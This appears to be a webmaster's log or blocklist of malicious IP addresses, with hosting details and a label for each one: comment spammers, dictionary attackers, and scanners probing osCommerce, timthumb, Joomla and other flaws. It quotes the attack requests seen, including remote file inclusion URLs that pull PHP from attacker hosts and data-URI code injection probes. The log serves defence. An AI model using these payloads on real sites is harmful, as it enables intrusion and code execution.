Host: Italy – Trieste Ovh Systems
Shared hosting web server: 56 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Bad host: OVH Systems
140.115.49.1 Host: Taiwan – Taipei Taiwan Academic Network Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Hetzner Online has multiple bad IPs
88.198.25.130 Hostname: static.88-198-25-130.clients.your-server.de
Host: Germany – Nuremberg Hetzner Online Ag
Shared hosting web server: 11 websites
Brute force attack looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Hetzner Online has multiple bad IPs
64.132.166.194 Hostname: 64-132-166-194.bridgeworldwide.com
United States – Cincinnati Bridge Worldwide
Dictionary attacker
95.31.42.89 Hostname: 95-31-42-89.broadband.corbina.ru
Host: Russian Federation – Moscow Ojsc Vimpelcom
Trackback spammer
199.15.233.130 Host: United States – Fort Worth Julian Roskilly Comment spammer
Bad host: More IPs
190.145.116.3 Host: Colombia – Bogota Telmex Colombia S.a. Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
94.73.137.105 Hostname: msa.com.tr mutfaktakariyer.com
Host: Turkey – Istanbul Cizgi Telekomunikasyon Hizmetleri Sanayi Ve Ticaret Limited Sirketi
Web server – 2 websites: haberpusula.com
Brute force / dictionary attacker
Tried to login to /user/ with name “admin”
Looking for Bitrix exploit vulnerability
184.105.235.22 Host: United States – Fremont Hurricane Electric Inc.
Shared hosting web server: 50 websites
Remote File Inclusion probe / WordPress timthumb RFI exploit:
/wp-content/themes/weekly/timthumb.php?src=
http %3A%2F%2Fflickr.com.013.in.rs%2Ftausug.php
37.123.99.212 Host: Turkey – Izmir Salay Telekomunikasyon Ticaret Limited Sirketi Attempting to login to site admin – /wp-login.php
173.70.141.147 Hostname: pool-173-70-141-147.nwrknj.fios.verizon.net
Host: United States – Springfield Verizon Online Llc
Rule breaker. Ignoring robots.txt
Looking for scripts:
/translate_static/js/element/main.js
/translate_static/js/element/hrs.swf
/.google-analytics.com/ga.js
88.190.61.187 Hostname: 88-190-61-187.rev.poneytelecom.eu
Host: France – Paris Dedibox Sas
Comment spammer
95.173.163.156 Hostname: 1560n2rzi.ni.net.tr
Host: Turkey – Izmir Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti
Web server – 1 website: haberpusula.com
Dictionary attacker
/wp-login.php
/administrator/index.php
/admin.php
/admin/index.php
/user/
/bitrix/admin/index.php?lang=en
91.215.216.30 Hostname: star.icnhost.net
Host: Bulgaria – Plovdiv Internet Corporated Networks Ltd.
Shared hosting web server: 232 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
94.181.68.251 Hostname: net68.79.95-251.izhevsk.ertelecom.ru
Host: Russian Federation – Izhevsk Cjsc Er-telecom Holding
Dictionary attacker, mail server
Bad host
67.212.91.121 Hostname: yonca.sibername.com
Host: Canada – Laval Netelligent Hosting Services Inc
Shared hosting web server: 470 websites
Remote File Inclusion probe / WordPress timthumb RFI exploit:
/wp-content/themes/Growing-Feature/includes/thumb.php?src=http%3A%2F%2Fflickr.com.dancesport.ro%2Fbad.php
46.229.164.100 Host: Netherlands – Amsterdam Haldex Ltd Spy bot: SemrushBot
User agent: Mozilla/5.0 (compatible; SemrushBot/0.96.4; +http: //www.semrush.com/bot.html)
91.226.212.79 Host: Russian Federation – Ivanovo Pe Ivanov Vitaliy Sergeevich
Shared hosting web server: 183 websites
Attempting joomlacontenteditor (com_jce) BLIND sql injection vulnerability exploit.
//index.php?6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b&cid
=20&file=imgmanager&method=form&option=com_jce&plugin=imgmanager&task=plugin/?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method
=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b
173.208.2.83 Hostname: 173.208.2.83.rdns.ubiquityservers.com
Host: United States – Chicago Ubiquity Server Solutions Chicago
Comment spammer
85.17.29.107 Hostname: hosted-by.leaseweb.com
Host: Netherlands – Amsterdam Leaseweb B.v.
Rule breaker, badly configured bot.
Possibly a web scraper.
95.173.184.198 Hostname: 1987yeawc.ni.net.tr
Host: Turkey – Denizli Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti.
Web server – 3 websites: classyazilim.com.tr , classyazilim.org , yazilimvadisi.net
Trying to login with user name “admin”
/user/
190.215.45.22 Host: Chile – Santiago Cristian Alejandro Campos Cerda
Shared hosting web server: 66 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
94.102.5.42 Hostname: 4280wrd6.ni.net.tr
Host: Turkey – Izmir Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti.
Shared hosting web server: 41 websites
Hacker/hackerbot looking for Bitrix CMS admin:
admin/index.php
admin/login.php
/bitrix/admin/index.php?lang=en
/user/
199.15.233.138 Host: United States – Fort Worth Justin Downing Comment spammer / Bad host
208.43.225.84 Hostname: 208.43.225.84-static.reverse.softlayer.com
Host: United States – Dallas Softlayer Technologies Inc.
Web server – 1 website: siteexplorer.info
Site Explorer bot:
Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http://siteexplorer.info/)
Rule breaker, spy-bot
61.38.186.55
61.38.186.76
Host: Korea – Seoul Dacom Corp. Comment spammer
98.126.218.98 Host: United States – Orange Krypt Technologies Comment spammer / Bad host
95.173.184.203 Hostname: 203unclhh.ni.net.tr
Host: Turkey – Denizli Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti.
Web server – 1 website: kouportal.com
Hacker/hackerbot looking for Bitrix CMS admin:
admin/index.php
admin/login.php
/bitrix/admin/index.php?lang=en
/user/
138.91.32.89 Host: United States – Redmond Microsoft Corp
Shared hosting web server: 4 websites
Attempting Snippet Master PHP Injection/ RFI exploit
//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=SnippetMastertest??
/&sa=U&ei=HUUSUq_UI8aw7Qa6nYGQAg&ved=0CM8BEBYwMQ&usg=AFQjCNFlgAmGeGg2TlcwArmwIyw8n4471w//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=SnippetMastertest??
93.135.123.29 Hostname: mnch-5d877b1d.pool.mediaWays.net
Host: Germany – Aschheim Ncc
Dictionary attack on wp-login
192.119.144.90 Host: United States – Dallas Paige Chen Comment spammer
Bad host: Paige Chen
37.220.22.10 Hostname: h37-220-22-10.host.redstation.co.uk
Host: Iran – Tehran Redstation Limited
Shared hosting web server: 40 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
Bad host: Redstation
148.208.243.2 Host: Mexico – Mexico City Secretaria De Educacion E Investigacion Tecnologic Looking for Joomla exploit
URL&=U&;ei=Dkr4UY35LNHK4APO8IHYAw&;ved=0CG0QFjAaOMgB&
;usg=AFQjCNFoj0HrqUsQIxH94ooX6N856i8mUw/
images/stories/3xp.php
DOMAIN/images/stories/3xp.php
94.127.188.17 Hostname: sm07.hospedando.com
Host: Spain – Alicante Access Basic Server S.l.
Shared hosting web server: 55 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
74.126.182.74 Hostname: 74-126-182-74.lucn.us
Host: United States – Pasadena Te Idc
Comment spammer
188.227.225.144 Hostname: masterproject.hu
Host: Hungary – Budapest Doclerweb Kft.
Shared hosting web server: 20 websites
Hacker/hackerbot:
Looking for admin pages
/admin/administrators.php/login.php
151.237.190.187 Host: Sweden – Stockholm Deepak Mehta Fie Comment spammer
Bad host: Deepak Mehta Fie
188.165.53.2 Host: France – Roubaix Ovh Systems Comment spammer
Bad host: Roubaix Ovh Systems
195.161.40.10 Host: Russian Federation – Moscow Ojsc Rtcomm.ru Mail server, dictionary attacker
Very high threat rating. BAN it now
199.91.65.138 Hostname: ip-199-91-65-138.rackalley.net
Host: United States – Los Angeles Rack Alley Llc
Web server – 2 websites: jesuslapps.com , livesoccartv.com
Hacker bot looking for:
/admin
/administrator
/checkout/cart
Malicious user agent: Apache-HttpClient/4.2.3 (java 1.5)
116.112.66.102 Host: China – Hohhot Innermengoliahuhhuttaipingyangcaichanbaoxian spam harvester, mail server, dictionary attacker, comment spammer, rule breaker
144.76.34.169 Hostname: sh-507.premium.hosttech.eu
Host: Germany – Nuremberg Server Block
Shared hosting web server: 19 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
RFI attack
/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
/admin/banner_manager.php/login.php?action=insert
/admin/categories.php/login.php?cPath=&action=new_product_preview
admin/file_manager.php/login.php?action=processuploads
59.47.43.92 Host: China – Shenyang Chinanet Liaoning Province Network Comment spammer
72.46.141.186 Host: United States – Chicago Versaweb Llc
Web server – 2 websites: fashionbo.com , w2v2.com
Hacker looking for exploit
wp-content/plugins/omni-secure-files/plupload/examples/upload.php
108.163.197.58 Hostname: host14.server5.vpn999.com
Host: United States – Chicago Singlehop Inc
Comment spammer
Bad host: Chicago Singlehop
216.244.79.171 Hostname: 171.static.sea.rackd.net
Host: United States – Seattle Private Customer
Comment spammer
69.152.127.130 Hostname: mail.bhlaw.net
Host: United States – Richardson Brown And Hofmeister Llp
Hacker looking for exploits – known FCK editor vulnerability
/FCKeditor/editor/filemanager/browser/default/connectors/test.html
108.163.194.35 Hostname: host11.server10.vpn999.com
Host: United States – Chicago Singlehop Inc
Comment spammer
Bad host: Chicago Singlehop
192.119.144.92 Host: United States – Dallas Paige Chen Comment spammer
69.22.169.51 Host: United States – Big Cove Tannery Giglinx Inc. Comment spammer
Bad host:
208.85.3.210 Hostname: 208-85-3-210.STATIC.turnkeyinternet.net
Host: United States – Tempe Turnkey Internet Inc.
Shared hosting web server: 18 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
69.175.121.51 Hostname: host12.server15.vpn999.com
Host: United States – Chicago Singlehop Inc
Comment spammer
Bad host: Chicago Singlehop
37.59.227.68 Host: France – Roubaix Ovh Systems Comment spammer
Bad host: Roubaix Ovh Systems
184.154.255.188 Hostname: host4.server6.vpn999.com
Host: United States – Chicago Singlehop Inc
Comment spammer
Bad host: Chicago Singlehop
81.169.138.77 Hostname: h2156579.stratoserver.net
Host: Germany – Berlin Strato Ag
Shared hosting web server: 12 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
201.99.57.24 Hostname: dsl-201-99-57-24-sta.prod-empresarial.com.mx
Host: Mexico – Mexico City Uninet S.a. De C.v.
Shared hosting web server: 5 websites
DoS attack
67.152.72.226 Hostname: ip67-152-72-226.z72-152-67.customer.algx.net
Host: United States – New York City Xo Communications
Mail server / Dictionary attacker
199.15.233.133 Host: United States – Fort Worth Julian Roskilly Comment spammer
184.154.254.58 Hostname: hos26.server15.vpn999.com
Host: United States – Chicago Singlehop Inc
Comment spammer
37.59.202.65 Host: France – Roubaix Ovh Systems Comment spammer
Bad host: Roubaix Ovh Systems
208.98.38.195 Host: United States – Missoula Sharktech Some sort of mis-configured bot – adding #main-content to all URLs
74.220.219.144 Hostname: box544.bluehost.com
Host: United States – Provo Unified Layer
Shared hosting web server: 89 websites
Trying to access /wp-admin
Bad web host
199.195.129.156 Host: United States – Minneapolis Vegasnap Llc Comment spammer
DoS attempt to post comment where no comment form exists – more than 1000 attempts logged in 90 seconds
36.248.241.71 Host: China – Fuzhou Xiamen City Fujian Provincial Network Of Unicom Brute force registration attempt using common registration paths
87.205.47.103 Hostname: 87-205-47-103.adsl.inetia.pl
Host: Poland – Warsaw Netia Sa
Trying to access wp-signup
Bad host
108.27.246.123 Hostname: pool-108-27-246-123.nycmny.fios.verizon.net
Host: United States – New York City Verizon Online Llc
Comment spammer
41.203.30.10 Host: South Africa – Johannesburg Hetzner (pty) Ltd Comment spammer
Bad host
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
199.180.129.205 Host: United States – Lawrence Dnsslave.com
Web server – 1 website: luvdy.com
Comment spammer
50.115.173.129 Host: United States – Kansas City Dnsslave.com
Web server – 1 website: 0538buy.com
Comment spammer
86.149.161.254 Hostname: host86-149-161-254.range86-149.btcentralplus.com
Host: United Kingdom – London Bt Public Internet Service
Looking for scripts
/jquery.min.map
192.227.137.179 Hostname: host.colocrossing.com
Host: United States – Kingston Hudson Valley Host
Comment spammer
216.244.71.18 Host: United States – Seattle Private Customer Comment spammer
188.165.44.4 Host: France – Roubaix Ovh Systems Comment spammer
Bad host
199.15.233.137 Host: United States – Fort Worth Justin Downing Comment spammer
108.61.45.43 Hostname: hosted-by.reliablesite.net
Host: United States – Greenwich Reliablesite.net Llc
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
Combined Brute force DoS attack with IP 195.186.81.56
195.186.81.56 Hostname: 56-81-186-195.bluewin.ch
Host: Switzerland – Zurich Bluewin Is An Internet Service Provider In Ch.
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
Combined Brute force DoS attack with IP 108.61.45.43
92.243.166.8 Host: Russian Federation – Moscow Akado-stolitsa Jsc Comment spammer
192.119.151.115 Host: United States – Dallas Avante Vps Comment spammer
37.202.4.134 Host: Germany – Espelkamp Mittwald Cm Service Gmbh Und Co.kg
Shared hosting web server: 14 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
107.20.161.197 Hostname: ec2-107-20-161-197.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Web address: Bollywood Hungama
Comment spammer
Bad activity – looking for /music.php
/music.php?audioid=1778827&protocol=httpdl&page=homepage
204.9.204.181 Hostname: 204.9.204.181.uscolo.com
Host: United States – Los Angeles Allcomm
Web server – 2 websites: bentleyharris.co , titanelectronics.co
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
85.214.243.241 Hostname: h2015152.stratoserver.net
Host: Germany Berlin Strato Ag
Shared hosting web server: 417 websites
RFI attempt – looking for vulnerability in:
/images/stories/3xp.php
110.181.37.1 Host: China – Datong Shanxi Telecom Datong Branch Ip Node Links To Customer Ip Address RFI attempt – looking for vulnerability in:
/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php
80.86.107.60 Hostname: static.12.39.40.188.clients.your-server.de
Host: Romania – Bucharest Ines Group Srl
Shared hosting web server: 49 websites
RFI attempt – looking for vulnerability in:
/images/stories/3xp.php
208.50.101.156 Company: United States – Broomfield Level 3 Communications Inc. Malware injection attempt:
Trying to inject atualizacao.cpl trojan to website
174.36.204.225 Hostname: 174.36.204.225-static.reverse.softlayer.com
Company: United States – Chicago Softlayer Technologies Inc.
Web server – 2 websites: phonenumbers.cc , vstats.co
Rule breaker / Bad bot
SiteExplorer/1.0
208.43.225.85 Hostname: 208.43.225.85-static.reverse.softlayer.com
Company: United States – Chicago Softlayer Technologies Inc.
Rule breaker / Bad bot
SiteExplorer/1.0
199.167.150.19 Hostname: tekverse.net
Host: United States – Tampa Noc4hosts Inc.
Web server – 1 website: tekverse.net
Comment spammer
Mail server
192.95.18.134 Host: France – Roubaix Ovh Systems Comment spammer
Bad host: Roubaix Ovh Systems
192.184.37.122 Host: United States – Walnut Psychz Networks Comment spammer
Bad host: Psychz Networks
192.74.240.210 Host: United States – San Jose Jitesi
PEGTECHINC – PEG TECH INC
Web server – 1 website: yigouwo.com
Comment spammer
Bad host: PEG TECH INC
184.154.167.78 Hostname: host35.server4.vpn999.com
Host: United States – Chicago Singlehop Inc.
Comment spammer
Trying to post links to malware scripts
Seen with hijacked browser user agent:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)
61.38.186.76 Host: Korea, Republic Of – Seoul Dacom Corp.
Web server – 1 website: tb999.com
Comment Spammer
63.143.46.146 Hostname: destakfotoseproducoes.net
Host: United States – Dallas Limestone Networks Inc.
Web server: 2 websites – destakfotoseproducoes.net , pokemonxplus.org
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
188.40.39.12 Hostname: static.12.39.40.188.clients.your-server.de
Host: Germany – Nuremberg Hetzner Online Ag
Shared hosting web server: 29 websites
Hacker looking for vulnerabilities
/admin/sqlpatch.php/password_forgotten.php?action=execute
Seems like targeting WordPress wpOnlineStore plugin
184.171.165.72 Host: United States – Phoenix Secured Servers Llc Looking for exploit vulnerabilities
/137595395452036422d831f.php
/cookie_usage.php
/shopping_cart.php
/product_info.php
173.226.23.2 Hostname: firewall.brentwoodacademy.com
Host: United States – Nashville Tw Telecom Holdings Inc.
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
172.246.132.154 Host: United States – Henderson Enzu Inc Comment Spammer
192.119.144.85 Host: United States – Dallas Paige Chen
Avante Hosting Services Inc
Comment Spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
94.205.129.184 Host: United Arab Emirates – Emirates Integrated Telecommunications Company Pjsc Comment Spammer
76.74.153.52 Hostname: server1.sexygirlsandwomen.com
Host: United States – Los Angeles Serverbeach
Shared hosting web server: 109 websites
Dictionary attack on wp-login using multiple usernames
50.87.109.74 Hostname: 50-87-109-74.unifiedlayer.com
Host: United States – Provo Unified Layer
Shared hosting web server: 28 websites
Trying to access wp-admin/config.php
190.37.96.246 Host: Venezuela, Bolivarian Republic Of – Caracas Cantv Servicios Venezuela Restricted region
looking for non-existent URLs
199.15.236.59 Host: United States – Tampa Noc4hosts Inc. Comment Spammer
198.178.121.122 Hostname: 198-178-121-122.static.hvvc.us
Host: United States – Fort Worth Digit Revenue
Rule breaker – User Agents:
Mozilla/5.0 (compatible; DioDiscover/1.7; +https://www.Datadio.com)
Mozilla/5.0 (compatible; DioScout/1.7; +https://www.Datadio.com)
Looking for non-existent file – /external.php and RSS feeds
5.135.77.222 Host: France – Roubaix Ovh Systems Comment Spammer
Bad host
192.187.125.194 Host: United States – Kansas City Datashack Lc Comment Spammer
208.115.226.216 Hostname: marquetingblackdever.com
Host: United States – Dallas Limestone Networks Inc.
Web server: marquetingblackdever.com
Remote File Inclusion probe / WordPress GD star ratings RFI exploit:
/wp-content/gd-star-rating/tumbh.php?src=http:
//picasa.com.tuson.ca/Fbat.php
88.242.99.82 Hostname: 88.242.99.82.dynamic.ttnet.com.tr
Host: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
DoS attack on /administrator/index.php
151.237.178.148 Host: United States – Amsterdam Deepak Mehta Fie Trying to post content
/node/add
Bad host
75.145.114.169 Hostname: 75-145-114-169-Colorado.hfc.comcastbusiness.net
Host: United States – Lafayette Random Android Apps
Shared hosting web server: 5 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
184.171.165.50 Host: United States – Phoenix Secured Servers Llc Scanning for exploit vulnerabilities
/137565348951fece711d53d.php
/shopping_cart.php
cookie_usage.php
/137565352051fece900cc84.php
/product_info.php
86.96.229.68 Host: United Arab Emirates – Dubai Emirates Telecommunications Corporation Comment Spammer
184.107.176.162 Hostname: host.eprogear.com
Host: Canada – Montreal Roberts Diesel Works Inc
Shared hosting web server: 19 websites
Remote File Inclusion probe / WordPress timthumb RFI exploit:
/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php
src=http: //flickr.com.timomentum.com.br/bad.php
85.25.248.40 Hostname: besthand.de
Host: Germany – Hurth Intergenia Ag
Shared hosting web server: 69 websites
Multiple Violations
1. Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
2. Fake User Agent:
FreeWebMonitoring SiteChecker/0.1 (+http: //www.freewebmonitoring.com)
36.250.177.28 China – Putian City Fujian Provincial Network Of Unicom Comment spammer
64.34.170.56 Hostname: server80.it4business.ca
Host: United States – Newhall Serverbeach
Shared hosting web server: 15 websites
Comment spammer – very high threat rating
89.253.242.44 Hostname: kirana.ru
Host: Russian Federation – Moscow Rusonyx Ltd.
Shared hosting web server: 89 websites
Looking for RFI exploit vulnerabilities
69.195.106.122 Hostname: 69-195-106-122.unifiedlayer.com
Host: United States – Provo Unified Layer
Shared hosting web server: 14 websites
Looking for RFI exploit vulnerabilities
/lib/connected_users.lib.php3?ChatPath=data:,%3C?php
%20print-439573653*57;%20?%3E?
37.72.170.98 Hostname: 98.170.72.37.static.swiftway.net
Host: United States – Chicago Eureka Solutions Sp. Z O.o.
Crawling forbidden URLs
92.53.123.104 Hostname: hawking.timeweb.ru
Host: Russian Federation – Moscow Ooo Lira-s
Shared hosting web server: 2360 websites
Looking for Black Hole Exploit:
/modules/mod_xsystem/mod_xsystem.php
185.12.92.249 Hostname: o.deserv.net
Host: Russian Federation – Tyumen’ Closed Joint Stock Company Ruweb
Shared hosting web server: 294 websites
Looking for RFI exploit vulnerabilities in Phpheaven
/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=
data:,%3C?php%20print-439573653*57;%20?%3E
144.76.40.81 Hostname: static.81.40.76.144.clients.your-server.de
Host: Germany – Nuremberg Server Block
Shared hosting web server: 118 websites
Looking for RFI exploit vulnerabilities in Redaxo CMS
/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=data:,%3C?php%
20print-439573653*57;%20?%3E
89.111.184.41 Hostname: 1094.ovz80.hc.ru
Host: Russian Federation – Moscow Garant-park-telecom Ltd.
Shared hosting web server: 3 websites – fibermag.ru , shs-systems.ru , spinetix.info
Looking for RFI exploit vulnerabilities in Broadband Mechanics
PeopleAggregator Module:
/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=data:,%3C?php%20
print-439573653*57;%20?%3E
188.132.135.38 Hostname: static-38-135-132-188.sadecehosting.net
Host: Turkey – Basaksehir Hosting Internet Hizmetleri Sanayi Ve Ticaret Anonim Sirketi
Trying to access wp_login.php
69.22.184.117 Host: United States – Torrance Giglinx Inc.
nLayer Communications, Inc
Comment spammer
Bad host: Torrance Giglinx Inc
172.245.209.139 Hostname: host.colocrossing.com
Host: United States – San Francisco Amazon.com Inc.
Shared hosting web server: 29 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
Specific attack on wpOnlineStore – determined by URL:
DOMAIN/wponlinestore-exploit-vulnerability&sa=U&;ei=n9v5UcmiBoLU9ATS04H4Aw&ved=0COUBEBYwPQ&usg=AFQjCNGlkBGh8L-8GS1AJQMHis0WuQmi_g/
admin/file_manager.php/login.php
184.169.203.101 Hostname: ec2-184-169-203-101.us-west-1.compute.amazonaws.com
Host: United States – San Francisco Amazon.com Inc.
Malicious bot / Rule breaker: UnwindFetchor/1.0
UA: UnwindFetchor/1.0 (+http://www.gnip.com/)
188.163.32.48 Hostname: SOL-FTTB.48.32.163.188.sovam.net.ua
Host: Ukraine – Zhytomyr Golden Telecom
Comment spammer
Bad host
204.124.182.156 Host: United States – Scranton Volumedrive Comment spammer
192.114.71.13 Hostname: bzq-114-71-13.static.bezeqint.net
Host: Israel – Petah Tikva Bezeq International Previously Trendline
Rule breaker bot
Multiple user agents on site at same time (like DoS attack)
41.0.33.42 Hostname: dynamic.compuking.co.za
Host: South Africa – Cape Town Vodacom
Shared hosting web server: 43 websites
Looking for Joomla exploit
URL&=U&;ei=Dkr4UY35LNHK4APO8IHYAw&;ved=0CG0QFjAaOMgB&
;usg=AFQjCNFoj0HrqUsQIxH94ooX6N856i8mUw/
images/stories/3xp.php
198.56.193.75 Hostname: 75.193-56-198.rdns.scalabledns.com
Host: United States – Los Angeles Enzu Inc
Comment spammer
173.234.196.102 Host: United States – Chicago Ubiquity Server Solutions Chicago
Web server: 2 websites – chandou.com.cn , kxsky.com
Comment spammer
Running a spambot from website
50.31.240.136 Hostname: 50.31.240.136.static.midphase.com
Host: Japan – Tokyo Hosting Services Inc.
Comment spammer
94.27.93.73 Hostname: SOL-FTTB.73.93.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment spammer
Bad host
94.27.76.55 Hostname: SOL-FTTB.55.76.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment spammer
Bad host
103.4.146.66 Hostname: mail.deshbd.com
Host: Bangladesh – Dhaka Next Online Ltd Isp Of Bangladesh
Trying to add content
node/add
188.163.12.67 Hostname: SOL-FTTB.67.12.163.188.sovam.net.ua
Host: Ukraine – Zhytomyr Golden Telecom
Comment spammer
Bad host
151.236.47.157 Hostname: 151-236-47-157.static.as29550.nett
Host: United Kingdom – Maidenhead Simply Transit Ltd
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
87.10.182.181 Hostname: host181-182-dynamic.10-87-r.retail.telecomitalia.it
Host: Italy – Roma Telecom Italia Net
Login attempt
Malicious user agent: Java/1.4.1_04
173.199.117.243 Hostname: 173.199.117.243.ahrefs.com
Host: United States – Piscataway Ahrefs Inc.
AS-CHOOPA – Choopa, LLC
Part of Ahrefs spy network
ahrefsbot
213.186.120.196 Hostname: 213.186.120.196.utel.net.ua
Host: Ukraine – Donets’k Utel Internet Services
Part of Ahrefs spy network
ahrefsbot
212.113.35.162 Hostname: nano2.dc.ukrtelecom.ua
Host: Ukraine – Kiev Utel Internet Services
Part of Ahrefs spy network
ahrefsbot
132.177.140.64 Host: United States – Durham University Of New Hampshire Malicious IP
50.97.33.178 Hostname: 50.97.33.178-static.reverse.softlayer.com
Host: United States – Dallas Softlayer Technologies Inc.
Web server: 1 website – ahrefs.com
Commercial spy organisation – Ahrefs
67.222.8.20 Hostname: host.augustineenterprisesbeta.com
Host: United States – Golden Privatesystems Networks Ca
Shared hosting web server: 20 websites
Looking for exploit possibilities
/wp-content/sxd/backup/
/wp-content/dumper/backup/
/sxd/backup/
/dumper/backup/
190.38.16.64 Hostname: 190-38-16-64.dyn.dsl.cantv.net
Host: Venezuela, Bolivarian Republic Of – Caracas Cantv Servicios Venezuela
Comment spammer
94.27.92.78 Hostname: SOL-FTTB.78.92.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment spammer, mail server
Bad host
106.2.166.225 Host: China – Beijing Beijing Kuanjie Net Communication Technology Ltd Spy bot: CloudServerMarketSpider/1.0
Mozilla/5.0 (compatible; CloudServerMarketSpider/1.0; +http: //www.cloudservermarket.com/spider.html)
71.181.95.134 Hostname: static-71-181-95-134.man.east.myfairpoint.net
Host: United States – Nashua Cis Technical
Shared hosting web server: 79 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
192.206.5.93 Hostname: lserver116.megavelocity.net
Host: United States – Kansas City Firedhost
Shared hosting web server: 39 websites
Looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
173.245.221.5 Host: United States – Prosser Egihosting Comment spammer
188.163.34.20 Hostname: SOL-FTTB.20.34.163.188.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment spammer
Bad host
192.151.156.250 Host: United States – Kansas City Firedhost
Web server: 1 website – mu-deathzone.com
Comment / trackback spammer
41.203.67.51 Host: Nigeria – Kaduna Globacom Information Systems Department Comment spammer, mail harvester, dictionary attacker
93.166.121.107 Host: Denmark Tranbjerg Tdc A/s Spam harvester, comment spammer
Looking for indexes – URLindex.php
High threat rating in Project Honeypot records
68.224.11.51 Hostname: ip68-224-11-51.lv.lv.cox.net
Host: United States – Las Vegas Cox Communications
Spammer
Also looking for exploit possibilities
/137501635951f515a72dfca.php
/product_info.php
/shopping_cart.php
